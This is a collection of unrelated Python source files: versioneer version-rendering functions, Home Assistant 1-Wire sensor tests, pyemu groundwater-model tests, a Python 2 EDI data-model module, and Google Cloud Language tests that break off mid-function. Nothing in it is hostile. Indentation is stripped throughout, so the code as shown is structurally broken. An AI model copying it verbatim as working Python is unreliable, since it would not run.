"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
|
"""Tests for 1-Wire devices connected on OWServer."""
from unittest.mock import patch
from pyownet.protocol import Error as ProtocolError
import pytest
from homeassistant.components.onewire.const import (
DEFAULT_OWSERVER_PORT,
DOMAIN,
PRESSURE_CBAR,
)
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.const import PERCENTAGE, TEMP_CELSIUS
from homeassistant.setup import async_setup_component
from tests.common import mock_registry
MOCK_CONFIG = {
"sensor": {
"platform": DOMAIN,
"host": "localhost",
"port": DEFAULT_OWSERVER_PORT,
"names": {
"10.111111111111": "My DS18B20",
},
}
}
MOCK_DEVICE_SENSORS = {
"00.111111111111": {"sensors": []},
"10.111111111111": {
"sensors": [
{
"entity_id": "sensor.my_ds18b20_temperature",
"unique_id": "/10.111111111111/temperature",
"injected_value": b" 25.123",
"result": "25.1",
"unit": TEMP_CELSIUS,
},
]
},
"1D.111111111111": {
"sensors": [
{
"entity_id": "sensor.1d_111111111111_counter_a",
"unique_id": "/1D.111111111111/counter.A",
"injected_value": b" 251123",
"result": "251123",
"unit": "count",
},
{
"entity_id": "sensor.1d_111111111111_counter_b",
"unique_id": "/1D.111111111111/counter.B",
"injected_value": b" 248125",
"result": "248125",
"unit": "count",
},
]
},
"22.111111111111": {
"sensors": [
{
"entity_id": "sensor.22_111111111111_temperature",
"unique_id": "/22.111111111111/temperature",
"injected_value": ProtocolError,
"result": "unknown",
"unit": TEMP_CELSIUS,
},
]
},
"28.111111111111": {
"sensors": [
{
"entity_id": "sensor.28_111111111111_temperature",
"unique_id": "/28.111111111111/temperature",
"injected_value": b" 26.984",
"result": "27.0",
"unit": TEMP_CELSIUS,
},
]
},
"3B.111111111111": {
"sensors": [
{
"entity_id": "sensor.3b_111111111111_temperature",
"unique_id": "/3B.111111111111/temperature",
"injected_value": b" 28.243",
"result": "28.2",
"unit": TEMP_CELSIUS,
},
]
},
"42.111111111111": {
"sensors": [
{
"entity_id": "sensor.42_111111111111_temperature",
"unique_id": "/42.111111111111/temperature",
"injected_value": b" 29.123",
"result": "29.1",
"unit": TEMP_CELSIUS,
},
]
},
"EF.111111111111": {
"inject_reads": [
b"HobbyBoards_EF", # read type
],
"sensors": [
{
"entity_id": "sensor.ef_111111111111_humidity",
"unique_id": "/EF.111111111111/humidity/humidity_corrected",
"injected_value": b" 67.745",
"result": "67.7",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111111_humidity_raw",
"unique_id": "/EF.111111111111/humidity/humidity_raw",
"injected_value": b" 65.541",
"result": "65.5",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111111_temperature",
"unique_id": "/EF.111111111111/humidity/temperature",
"injected_value": b" 25.123",
"result": "25.1",
"unit": TEMP_CELSIUS,
},
],
},
"EF.111111111112": {
"inject_reads": [
b"HB_MOISTURE_METER", # read type
b" 1", # read is_leaf_0
b" 1", # read is_leaf_1
b" 0", # read is_leaf_2
b" 0", # read is_leaf_3
],
"sensors": [
{
"entity_id": "sensor.ef_111111111112_wetness_0",
"unique_id": "/EF.111111111112/moisture/sensor.0",
"injected_value": b" 41.745",
"result": "41.7",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111112_wetness_1",
"unique_id": "/EF.111111111112/moisture/sensor.1",
"injected_value": b" 42.541",
"result": "42.5",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111112_moisture_2",
"unique_id": "/EF.111111111112/moisture/sensor.2",
"injected_value": b" 43.123",
"result": "43.1",
"unit": PRESSURE_CBAR,
},
{
"entity_id": "sensor.ef_111111111112_moisture_3",
"unique_id": "/EF.111111111112/moisture/sensor.3",
"injected_value": b" 44.123",
"result": "44.1",
"unit": PRESSURE_CBAR,
},
],
},
}
@pytest.mark.parametrize("device_id", MOCK_DEVICE_SENSORS.keys())
async def test_owserver_setup_valid_device(hass, device_id):
"""Test for 1-Wire device."""
entity_registry = mock_registry(hass)
dir_return_value = [f"/{device_id}/"]
read_side_effect = [device_id[0:2].encode()]
if "inject_reads" in MOCK_DEVICE_SENSORS[device_id]:
read_side_effect += MOCK_DEVICE_SENSORS[device_id]["inject_reads"]
expected_sensors = MOCK_DEVICE_SENSORS[device_id]["sensors"]
for expected_sensor in expected_sensors:
read_side_effect.append(expected_sensor["injected_value"])
with patch("homeassistant.components.onewire.sensor.protocol.proxy") as owproxy:
owproxy.return_value.dir.return_value = dir_return_value
owproxy.return_value.read.side_effect = read_side_effect
assert await async_setup_component(hass, SENSOR_DOMAIN, MOCK_CONFIG)
await hass.async_block_till_done()
assert len(entity_registry.entities) == len(expected_sensors)
for expected_sensor in expected_sensors:
entity_id = expected_sensor["entity_id"]
registry_entry = entity_registry.entities.get(entity_id)
assert registry_entry is not None
assert registry_entry.unique_id == expected_sensor["unique_id"]
assert registry_entry.unit_of_measurement == expected_sensor["unit"]
state = hass.states.get(entity_id)
assert state.state == expected_sensor["result"]
|
|
import os
import platform
ext = ''
local_bins = False # change if wanting to test with local binary exes
if local_bins:
bin_path = os.path.join("..", "..", "bin")
if "linux" in platform.platform().lower():
pass
bin_path = os.path.join(bin_path, "linux")
elif "darwin" in platform.platform().lower() or 'macos' in platform.platform().lower():
pass
bin_path = os.path.join(bin_path, "mac")
else:
bin_path = os.path.join(bin_path, "win")
ext = '.exe'
else:
bin_path = ''
if "windows" in platform.platform().lower():
ext = '.exe'
mf_exe_name = os.path.join(bin_path,"mfnwt")
pp_exe_name = os.path.join(bin_path, "pestpp-glm")
ies_exe_name = os.path.join(bin_path, "pestpp-ies")
swp_exe_name = os.path.join(bin_path, "pestpp-swp")
# for f in [mf_exe_name,pp_exe_name,ies_exe_name]:
# if not os.path.exists(f):
# raise Exception("{0} not found",f)
def freyberg_test():
import shutil
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
org_model_ws = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=org_model_ws, check=False,forgive=False,
exe_name=mf_exe_name)
setattr(m,"sr",pyemu.helpers.SpatialReference(delc=m.dis.delc.array,delr=m.dis.delr.array))
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name,m.name+".nam"),org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name,m.name+".nam"),cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template1"
props = [["upw.hk",None],["upw.vka",None],["upw.ss",None],["rch.rech",None]]
hds_kperk = [[kper,0] for kper in range(m.nper)]
temp_bc_props = [["wel.flux",kper] for kper in range(m.nper)]
spat_bc_props= [["wel.flux",2]]
ph = pyemu.helpers.PstFromFlopyModel(m,new_model_ws,org_model_ws,
const_props=props,
zone_props=props,
kl_props=props,
pp_props=props,
grid_props=props,
hds_kperk=hds_kperk,
sfr_pars=True,sfr_obs=True,
spatial_bc_props=spat_bc_props,
temporal_bc_props=temp_bc_props,
remove_existing=True,
model_exe_name="mfnwt")
# tmp = mf_exe_name.split(os.sep)
# tmp = os.path.join(*tmp[1:])+ext
# assert os.path.exists(tmp),tmp
# shutil.copy2(tmp,os.path.join(new_model_ws,"mfnwt"+ext))
ph.pst.control_data.noptmax = 0
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name,"test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
ph.pst.parrep(os.path.join(new_model_ws,"test.par"))
res = pyemu.pst_utils.read_resfile(os.path.join(new_model_ws,"test.rei"))
ph.pst.observation_data.loc[res.name,"obsval"] = res.modelled
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name, "test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par","iobj"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
df = pd.read_csv(os.path.join(new_model_ws,"test.iobj"))
assert df.total_phi.iloc[0] < 1.0e-10
pe = ph.draw(10)
pe.to_csv(os.path.join(new_model_ws,"par_en.csv"))
ph.pst.pestpp_options["ies_par_en"] = "par_en.csv"
ph.pst.control_data.noptmax = 1
ph.pst.write(os.path.join(new_model_ws, "test.pst"))
master_dir = "test_master"
pyemu.os_utils.start_workers(new_model_ws,ies_exe_name,"test.pst",
num_workers=10,worker_root='.',
master_dir=master_dir,silent_master=False)
df = pd.read_csv(os.path.join(master_dir,"test.phi.meas.csv"),index_col=0)
init_phi = df.loc[0,"mean"]
final_phi = df.loc[1,"mean"]
assert final_phi < init_phi
def fake_run_test():
import os
import numpy as np
import pyemu
new_model_ws = "template1"
if not os.path.exists(new_model_ws):
freyberg_test()
pst = pyemu.Pst(os.path.join(new_model_ws,"freyberg.pst"))
pst.pestpp_options["ies_num_reals"] = 10
pst.pestpp_options["ies_par_en"] = "par_en.csv"
pst.control_data.noptmax = 0
#pst = pyemu.helpers.setup_fake_forward_run(pst,"fake.pst",org_cwd=new_model_ws)
#pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"fake.pst"),cwd=new_model_ws)
#pyemu.os_utils.run("{0} {1}".format(ies_exe_name, "fake.pst"), cwd=new_model_ws)
new_cwd = "fake_test"
pst = pyemu.helpers.setup_fake_forward_run(pst, "fake.pst", org_cwd=new_model_ws,new_cwd=new_cwd)
s = pst.process_output_files(new_cwd)
if s is not None:
assert s.dropna().shape[0] == pst.nobs
obs = pst.observation_data
diff = (100 * (obs.obsval - s.obsval) / obs.obsval).apply(np.abs)
print(diff)
print(obs.loc[diff>0.0,"obsval"],s.loc[diff>0.0,"obsval"])
assert diff.sum() < 1.0e-3,diff.sum()
pyemu.os_utils.run("{0} {1}".format(ies_exe_name, "fake.pst"), cwd=new_cwd)
def freyberg_kl_pp_compare():
import shutil
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
org_model_ws_base = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=org_model_ws_base, check=False, forgive=False,
exe_name=mf_exe_name)
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name, m.name + ".nam"), org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name, m.name + ".nam"), cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template1"
props = [["upw.hk", None]]
hds_kperk = [[kper, 0] for kper in range(m.nper)]
temp_bc_props = [["wel.flux", kper] for kper in range(m.nper)]
spat_bc_props = [["wel.flux", 2]]
ph = pyemu.helpers.PstFromFlopyModel(nam_file, new_model_ws, org_model_ws,
kl_props=props,
kl_num_eig=66,
pp_props=props,
pp_space=3,
hds_kperk=hds_kperk,
sfr_obs=True,
remove_existing=True,
model_exe_name="mfnwt")
obs = ph.pst.observation_data
hds_obs = obs.loc[obs.obgnme=="hds",:].copy()
hds_obs.loc[:, "i"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[2]))
hds_obs.loc[:, "j"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[3]))
hds_obs.loc[:,'ij'] = hds_obs.apply(lambda x: "{0:02d}{1:02d}".format(x.i,x.j),axis=1)
hds_obs.loc[:, "kper"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[4]))
hds_obs = hds_obs.loc[hds_obs.kper==hds_obs.kper.max(),:]
obs.loc[:,"weight"] = 0.0
obs_locs = pd.read_csv(os.path.join(org_model_ws_base,"obs_loc.csv"))
obs_locs.loc[:,"ij"] = obs_locs.apply(lambda x: "{0:02d}{1:02d}".format(x.row-1,x.col-1),axis=1)
print(obs_locs)
print(hds_obs.i.max(),hds_obs.j.max())
print(hds_obs.head())
hds_nz_obs = hds_obs.loc[hds_obs.ij.apply(lambda x: x in obs_locs.ij.values),"obsnme"]
print(hds_nz_obs)
obs.loc[hds_nz_obs,"weight"] = 1.0
obs.loc[hds_nz_obs,"obsval"] += np.random.normal(0.0,1.0,len(hds_nz_obs))
ph.pst.control_data.noptmax = 6
ph.pst.parameter_data.loc[ph.pst.parameter_data.pargp!="pp_hk0","partrans"] = "fixed"
ph.pst.write(os.path.join(new_model_ws,"pest_pp.pst"))
ph.pst.parameter_data.loc[:,"partrans"] = "log"
ph.pst.parameter_data.loc[ph.pst.parameter_data.pargp == "pp_hk0", "partrans"] = "fixed"
ph.pst.write(os.path.join(new_model_ws, "pest_kl.pst"))
pyemu.os_utils.start_workers(new_model_ws,"pestpp-ies","pest_pp.pst", num_workers=10,worker_root='.',
master_dir="pest_pp")
def freyberg_diff_obs_test():
import shutil
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
oorg_model_ws = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=oorg_model_ws, check=False,forgive=False,
exe_name=mf_exe_name)
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name,m.name+".nam"),org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name,m.name+".nam"),cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template_diff_obs"
props = [["upw.hk",None]]
hds_kperk = [[0,k] for k in range(m.nlay)]
ph = pyemu.helpers.PstFromFlopyModel(nam_file,new_model_ws,org_model_ws,
const_props=props,
hds_kperk=hds_kperk,
sfr_pars=True,sfr_obs=True,
remove_existing=True,
model_exe_name="mfnwt")
obs_locs = pd.read_csv(os.path.join(oorg_model_ws,"obs_loc.csv"))
obs_locs.loc[:, "i"] = obs_locs.pop("row") - 1
obs_locs.loc[:, "j"] = obs_locs.pop("col") - 1
obs_locs.loc[:,"site"] = obs_locs.apply(lambda x: "trgw_{0:03d}_{1:03d}".format(x.i,x.j),axis=1)
kij_dict = {site: (2, i, j) for site, i, j in zip(obs_locs.site, obs_locs.i, obs_locs.j)}
binary_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".hds"))
frun_line, tr_hds_df = pyemu.gw_utils.setup_hds_timeseries(binary_file, kij_dict=kij_dict, include_path=True,
model=ph.m)
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws,nam_file.replace(".nam", ".hds_timeseries.processed.ins"))
df = ph.pst.add_observations(ins_file,pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[df.index, "weight"] = 1.0
#trgw_groups = obs.loc[df.index, "obgnme"].unique()
#obs.loc[obs.obgnme.apply(lambda x: x in trgw_groups[::2]),"weight"] = 0.0
#obs.loc[ph.pst.nnz_obs_names[::2],"weight"] = 0.0
frun_line, tr_hds_diff_df = pyemu.helpers.setup_temporal_diff_obs(ph.pst, ins_file, include_path=True,
prefix="hdif")
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".hds_timeseries.processed.diff.processed.ins"))
df = ph.pst.add_observations(ins_file, pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[tr_hds_diff_df.index, "weight"] = tr_hds_diff_df.weight
obs.loc[tr_hds_diff_df.index, "obgnme"] = tr_hds_diff_df.obgnme
ins_file = os.path.join(ph.m.model_ws,nam_file.replace(".nam",".sfr.out.processed.ins"))
frun_line,tr_hds_diff_df = pyemu.helpers.setup_temporal_diff_obs(ph.pst,ins_file,include_path=True,
prefix="sfrdif")
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".sfr.out.processed.diff.processed.ins"))
df = ph.pst.add_observations(ins_file, pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[tr_hds_diff_df.index, "weight"] = tr_hds_diff_df.weight
obs.loc[tr_hds_diff_df.index, "obgnme"] = tr_hds_diff_df.obgnme
ph.write_forward_run()
# tmp = mf_exe_name.split(os.sep)
# tmp = os.path.join(*tmp[1:])+ext
# assert os.path.exists(tmp),tmp
# shutil.copy2(tmp,os.path.join(new_model_ws,"mfnwt"+ext))
ph.pst.control_data.noptmax = 0
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name,"test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
pst = pyemu.Pst(os.path.join(new_model_ws,"test.pst"))
print(pst.phi)
assert pst.phi < 1.0e-6,pst.phi
if __name__ == "__main__":
#freyberg_diff_obs_test()
freyberg_test()
#freyberg_kl_pp_compare()
#import shapefile
#run_sweep_test()
#fake_run_test()
|
|
# The MIT License (MIT)
#
# Copyright (c) 2014 Max Holtzberg <mh@uvc.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import decimal
from lxml import etree
import re
import sys
import urllib2
class Field(object):
def __init__(self, *args, **kwargs):
self._default = kwargs.get('default', None)
self._args = args
self._kwargs = kwargs
def parse(self, rec):
for prefix in [''] + rec._prefixes:
for path in self._args:
node = rec._data.find(prefix + path, namespaces=rec._namespaces)
if node is not None:
return self._convert(node)
return self._default
class Bool(Field):
_neg = False
def _convert(self, node):
if 'equals' in self._kwargs:
res = self._kwargs['equals'] == node.text
else:
res = bool(node.text)
return res ^ self._neg
def __invert__(self):
self._neg = True
return self
class String(Field):
def __init__(self, *args, **kwargs):
super(String, self).__init__(*args, **kwargs)
if 'subst' in kwargs:
exp, self._sub = kwargs['subst']
self._exp = re.compile(exp)
else:
self._exp = None
def _convert(self, node):
if self._exp is None:
return unicode(node.text)
else:
return self._exp.sub(self._sub, node.text)
class Integer(Field):
def _convert(self, node):
return int(node.text)
class Decimal(Field):
def _convert(self, node):
return decimal.Decimal('%.2f' % decimal.Decimal(
node.text.replace(',', '.')))
class URL(Field):
def _convert(self, node):
return buffer(urllib2.urlopen(node.text).read())
class One2Many(Field):
def parse(self, rec):
for path in self._args:
items = rec._data.xpath(path, namespaces=rec._namespaces)
if len(items) > 0:
return self._convert(items)
if self._default is None:
return []
return self._default
def _convert(self, items):
return map(self._kwargs['model'], items)
class Many2One(Field):
def parse(self, rec):
if len(self._args) <= 0:
return self._convert(rec._data)
return super(Many2One, self).parse(rec)
def _convert(self, node):
return self._kwargs['model'](node)
class Attribute(Field):
def _convert(self, node):
return node.get(self._kwargs['attr'])
class Model(object):
_namespaces = {}
_prefixes = []
valid = Bool(default=False)
def __init__(self, data, context=None):
if isinstance(data, etree._Element):
self._data = data
self._ctx = context
else:
self._load(data)
def _load(self, data):
# Fill instance from data, maybe a primary key
raise NotImplementedError()
def __getattribute__(self, name):
attr = super(Model, self).__getattribute__(name)
if isinstance(attr, Field):
return attr.parse(self)
return attr
@classmethod
def copy(cls, context):
Class = type(cls.__name__, cls.__bases__, dict(cls.__dict__))
Class._ctx = context
return Class
@classmethod
def search(cls, keywords, offset=0, limit=20, count=False):
raise NotImplementedError()
@classmethod
def read(cls, codes):
raise NotImplementedError()
@classmethod
def create(cls, records):
raise NotImplementedError()
@classmethod
def update(cls, records):
raise NotImplementedError()
class ProductBase(Model):
name = Field()
description = Field()
code = Field()
replacement = Field()
ean13 = Field()
list_price = Field()
cost_price = Field()
picture = Field()
manufacturer = Field()
@property
def availability(self):
return None
class OrderBase(Model):
orderid = Field()
lines = Field()
class EDIException(Exception):
@property
def code(self):
return self._code
@property
def message(self):
return self._msg
def __str__(self):
return repr(self._msg)
class ContextBase(object):
def __init__(self, url, userid, passwd, log=False):
self._url = url
self._userid = userid
self._passwd = passwd
self._log = log
def log(self, info, msg):
if self._log:
frame = sys._getframe(1)
cls = frame.f_locals.get('self', False)
cls = cls.__class__.__name__ + '.' if cls else ''
print '[ @%s%s (%s) ]' % (cls, frame.f_code.co_name, info)
print msg + '\n'
def get(self, clsname):
raise NotImplementedError()
def connect(self):
raise NotImplementedError()
def get_product(self, code):
raise NotImplementedError()
def check(self):
raise NotImplementedError()
|
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
ANNOTATE_NAME = 'Moon'
ANNOTATE_CONTENT = 'A cow jumped over the %s.' % (ANNOTATE_NAME,)
ANNOTATE_SCORE = 1
ANNOTATE_MAGNITUDE = 0.2
ANNOTATE_SALIENCE = 0.11793101
ANNOTATE_WIKI_URL = 'http://en.wikipedia.org/wiki/Natural_satellite'
def _make_token_json(name, part_of_speech, head, edge_label):
token_dict = {
'text': {
'content': name,
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'NOMINATIVE',
'mood': 'MOOD_UNKNOWN',
'tag': part_of_speech,
'person': 'FIRST',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN',
},
'dependencyEdge': {
'headTokenIndex': head,
'label': edge_label,
},
'lemma': name,
}
return token_dict
def _get_token_and_sentences(include_syntax):
from google.cloud.language.syntax import PartOfSpeech
if include_syntax:
token_info = [
('A', PartOfSpeech.DETERMINER, 1, 'DET'),
('cow', PartOfSpeech.NOUN, 2, 'NSUBJ'),
('jumped', PartOfSpeech.VERB, 2, 'ROOT'),
('over', PartOfSpeech.ADPOSITION, 2, 'PREP'),
('the', PartOfSpeech.DETERMINER, 5, 'DET'),
(ANNOTATE_NAME, PartOfSpeech.NOUN, 3, 'POBJ'),
('.', PartOfSpeech.PUNCTUATION, 2, 'P'),
]
sentences = [
{
'text': {
'content': ANNOTATE_CONTENT,
'beginOffset': -1,
},
},
]
else:
token_info = []
sentences = []
return token_info, sentences
def _get_entities(include_entities):
from google.cloud.language.entity import EntityType
if include_entities:
entities = [
{
'name': ANNOTATE_NAME,
'type': EntityType.LOCATION,
'metadata': {
'wikipedia_url': ANNOTATE_WIKI_URL,
},
'salience': ANNOTATE_SALIENCE,
'mentions': [
{
'text': {
'content': ANNOTATE_NAME,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
]
},
]
else:
entities = []
return entities
def make_mock_client(response, api_version='v1'):
import mock
from google.cloud.language.client import Client
connection = mock.Mock(spec=Client._CONNECTION_CLASSES[api_version])
connection.API_VERSION = api_version
connection.api_request.return_value = response
return mock.Mock(_connection=connection, spec=Client)
class TestEncoding(unittest.TestCase):
def test_default_low_maxunicode(self):
import sys
import mock
from google.cloud.language.document import Encoding
with mock.patch.dict(sys.__dict__, maxunicode=65535):
self.assertEqual(Encoding.get_default(), Encoding.UTF16)
with mock.patch.dict(sys.__dict__, maxunicode=1114111):
self.assertEqual(Encoding.get_default(), Encoding.UTF32)
class TestDocument(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.document import Document
return Document
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor_defaults(self):
import google.cloud.language.document as MUT
client = object()
content = 'abc'
document = self._make_one(client, content)
self.assertIs(document.client, client)
self.assertEqual(document.content, content)
self.assertIsNone(document.gcs_url)
self.assertIsNone(document.language)
self.assertEqual(document.doc_type, MUT.Document.PLAIN_TEXT)
self.assertEqual(document.encoding, MUT.Encoding.get_default())
def test_constructor_explicit(self):
import google.cloud.language.document as MUT
client = object()
gcs_url = 'gs://some-bucket/some-obj.html'
language = 'ja'
document = self._make_one(client, gcs_url=gcs_url,
